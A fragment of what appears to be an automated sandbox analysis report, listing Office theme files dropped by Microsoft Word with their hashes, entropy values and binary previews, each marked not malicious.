                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):276
                                                                                      Entropy (8bit):3.5361139545278144
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                      MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                      SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                      SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                      SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):924687
                                                                                      Entropy (8bit):7.824849396154325
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                      MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                      SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                      SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                      SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):3.51145753448333
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                      MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                      SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                      SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                      SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):966946
                                                                                      Entropy (8bit):7.8785200658952
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                      MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                      SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                      SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                      SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                      Malicious:false
                                                                                      Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):3.5323495192404475
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                      MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                      SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                      SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                      SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1649585
                                                                                      Entropy (8bit):7.875240099125746
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                      MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                      SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                      SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                      SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                      Malicious:false
                                                                                      Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):284
                                                                                      Entropy (8bit):3.5552837910707304
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                      MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                      SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                      SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                      SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):976001
                                                                                      Entropy (8bit):7.791956689344336
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                      MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                      SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                      SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                      SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):278
                                                                                      Entropy (8bit):3.5270134268591966
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                      MD5:327DA4A5C757C0F1449976BE82653129
                                                                                      SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                      SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                      SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1204049
                                                                                      Entropy (8bit):7.92476783994848
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                      MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                      SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                      SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                      SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                      Malicious:false
                                                                                      Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):276
                                                                                      Entropy (8bit):3.5364757859412563
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                      MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                      SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                      SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                      SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1091485
                                                                                      Entropy (8bit):7.906659368807194
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                      MD5:2192871A20313BEC581B277E405C6322
                                                                                      SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                      SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                      SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                      Malicious:false
                                                                                      Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):280
                                                                                      Entropy (8bit):3.5301133500353727
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                                                      MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                                                      SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                                                      SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                                                      SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):1463634
                                                                                      Entropy (8bit):7.898382456989258
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                      MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                      SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                      SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                      SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):280
                                                                                      Entropy (8bit):3.5286004619027067
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                      MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                      SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                      SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                      SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):1750795
                                                                                      Entropy (8bit):7.892395931401988
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                                                      MD5:529795E0B55926752462CBF32C14E738
                                                                                      SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                                                      SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                                                      SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                                                      Malicious:false
                                                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):280
